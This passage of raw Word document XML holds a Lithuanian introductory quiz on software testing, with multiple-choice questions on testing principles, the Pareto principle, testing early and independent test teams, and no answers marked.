    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="004B4E5F" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">1 </w:t>
      </w:r>
      <w:r w:rsidR="00B7488E" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>užduotis</w:t>
      </w:r>
      <w:r w:rsidR="00F54EE6" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="003A47AB" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ĮVADAS Į TESTAVIMĄ</w:t>
      </w:r>
      <w:r w:rsidR="007C4AAD">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00705D1C" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Atsakykite į žemiau pateiktus klausimus. Kiekvie</w:t>
      </w:r>
      <w:r w:rsidR="00850262" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>nas klausimas gali turėti vieną arba daugiau teisingų atsakymų</w:t>
      </w:r>
      <w:r w:rsidR="00C3696A">
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="005E05A7" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>UŽDUOTIES TIKSLAS</w:t>
      </w:r>
      <w:r w:rsidR="00606743" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00B83433" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">Suprasti, kas yra programinės įrangos testavimas. </w:t>
      </w:r>
      <w:r w:rsidR="001758A6" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">Suprasti, kas yra programinės įrangos kūrimo ciklas. </w:t>
      </w:r>
      <w:r w:rsidR="00B83433" w:rsidRPr="00AD4464">
        <w:t>Mokėti pag</w:t>
      </w:r>
      <w:r w:rsidR="009847C7" w:rsidRPr="00AD4464">
        <w:t>rindines sąvokas ir apibrėžimus</w:t>
      </w:r>
      <w:r w:rsidR="00C3696A">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00442FB3" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Koks yra skirtumas tarp testavimo ir kokyb</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ės?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="004B4E5F" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>K</w:t>
      </w:r>
      <w:r w:rsidR="00890722" w:rsidRPr="00AD4464">
        <w:t>okybė</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00890722" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> tai veikla</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00890722" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> skirta patikrinti</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> programinę įrangą, o testavimas-</w:t>
      </w:r>
      <w:r w:rsidR="00890722" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> tai procesas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00890722" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Testavimas</w:t>
      </w:r>
      <w:r w:rsidR="004B4E5F" w:rsidRPr="00AD4464">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> tai veikla kokybės užtikrinimo procese</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="004B4E5F" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Testavimas tikrina ar viską darome teisingai, o</w:t>
      </w:r>
      <w:r w:rsidR="00890722" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> kokybė tik</w:t>
      </w:r>
      <w:r w:rsidR="009847C7" w:rsidRPr="00AD4464">
        <w:t>rina ar darome teisingus dalykus</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="004B4E5F" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Kokybė-</w:t>
      </w:r>
      <w:r w:rsidR="00890722" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> tai testavimo pro</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidR="00890722" w:rsidRPr="00AD4464">
        <w:t>eso dalis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="0090672E" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Kiek iš viso yra testavimo pr</w:t>
      </w:r>
      <w:r w:rsidR="0002324C" w:rsidRPr="00AD4464">
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>ncipų</w:t>
      </w:r>
      <w:r w:rsidR="003E2D5A" w:rsidRPr="00AD4464">
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="0090672E" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>9</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="0090672E" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="0090672E" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="0090672E" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A847D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Kuris i</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>š žemiau pateiktų testavimo pr</w:t>
      </w:r>
      <w:r w:rsidR="00BD3113" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>incipų</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> labiausiai nusako rizika grindžiamą priorit</w:t>
      </w:r>
      <w:r w:rsidR="00584351" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>et</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>izavimą?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A847D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Pesticidų paradoksas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00BD3113" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Testuojame kiek</w:t>
      </w:r>
      <w:r w:rsidR="00A847D2" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> įmanoma anksčiau</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00BD3113" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">Visiškas ištestavimas nėra </w:t>
      </w:r>
      <w:r w:rsidR="009847C7" w:rsidRPr="00AD4464">
        <w:t>įmanomas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00BD3113" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Defektų dažniausiai</w:t>
      </w:r>
      <w:r w:rsidR="00A847D2" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00584351" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">tam tikroje sistemos vietoje </w:t>
      </w:r>
      <w:r w:rsidR="00A847D2" w:rsidRPr="00AD4464">
        <w:t>būna</w:t>
      </w:r>
      <w:r w:rsidR="00584351" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> daugiau nei vienas </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A847D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">Kodėl testuoti pradedame </w:t>
      </w:r>
      <w:r w:rsidR="003D7BF9" w:rsidRPr="00AD4464">
        <w:t>kiek įmanoma anksčiau</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A847D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Paprasčiau apmokyti testuotojus</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A847D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Anksti atrastus defektus ištaisyti yra pigiau</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A847D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Paprasčiau pradėti reikalavimų peržiūrą</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A847D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Defektų paieška sistemos projektavimo fazėje yra efektyvesnė</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A847D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Ką sako Pareto principas?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A847D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>20% defekt</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">ų sukelia </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">80% </w:t>
      </w:r>
      <w:r w:rsidR="00807AFE" w:rsidRPr="00AD4464">
        <w:t>problemų</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A847D2" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">80% kodo yra 20% visų defektų </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00142F65" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">80% kodo dengia </w:t>
      </w:r>
      <w:r w:rsidR="0053012D" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">20% </w:t>
      </w:r>
      <w:r w:rsidR="00807AFE" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ku</w:t>
      </w:r>
      <w:r w:rsidR="0053012D" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>riamų</w:t>
      </w:r>
      <w:r w:rsidR="0053012D" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> funkcijų</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="0053012D" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">20% </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>kodo dažniausiai nėra naudojama</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00807AFE" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Nurodykite didžiausią</w:t>
      </w:r>
      <w:r w:rsidR="00706141" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> testuotojo ir programotojo požiūrio skirtumą</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00706141" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Testuotojas galvoja, kaip t</w:t>
      </w:r>
      <w:r w:rsidR="00807AFE" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">estuoti, programuotojas – kaip </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="00807AFE" w:rsidRPr="00AD4464">
        <w:t>ro</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>gramuoti</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00706141" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Programuotojas galvoja kaip paslėpti klaidas, testuotojas – kaip jas rasti</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00706141" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Programuotojas galvoja kaip kurti PĮ, testuotojas – kaip laužyti</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00706141" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Testuotojas galvoja kaip apsaugoti PĮ, programuotojas – kaip atnaujinti</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="006C3B58" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Kodėl siekiame nepriklausomo PĮ testavimo?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F84D3B" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Dėl objektyvumo</w:t>
      </w:r>
      <w:r w:rsidR="006C3B58" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> sunku pastebėti savo klaidas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="006C3B58" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Siekiame atlaisvinti programuotojus nuo testavimo veiklų</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00807AFE" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:lastRenderedPageBreak/>
        <w:t>Turėti nepriklausomą</w:t>
      </w:r>
      <w:r w:rsidR="006C3B58" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> testuotojų komandą yra pigiau</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="006C3B58" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Nepriklausomi testuotojai turi daugiau patirties</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00807AFE" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Kokie yra nepriklausomos testa</w:t>
      </w:r>
      <w:r w:rsidR="00B37614" w:rsidRPr="00AD4464">
        <w:t>v</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>imo komandos trū</w:t>
      </w:r>
      <w:r w:rsidR="00B37614" w:rsidRPr="00AD4464">
        <w:t>kumai?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B37614" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Testuotojai gali būti izoliuoti nuo komandos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B37614" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Nepriklausomas testavimas gali reikšti mažiau atrastų klaidų</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B37614" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Testuotojui gal</w:t>
      </w:r>
      <w:r w:rsidR="00F84D3B" w:rsidRPr="00AD4464">
        <w:t>i būti sunku pakeisti karjeros k</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>ryptį</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B37614" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Programuotojai testuoja savo kodą prieš perduodami testuotojams</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00862C6D" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Kuris iš pateiktų teigin</w:t>
      </w:r>
      <w:r w:rsidR="00F84D3B" w:rsidRPr="00AD4464">
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>ų NĖRA testavimo uždavinys?</w:t>
      </w:r>
    </w:p>
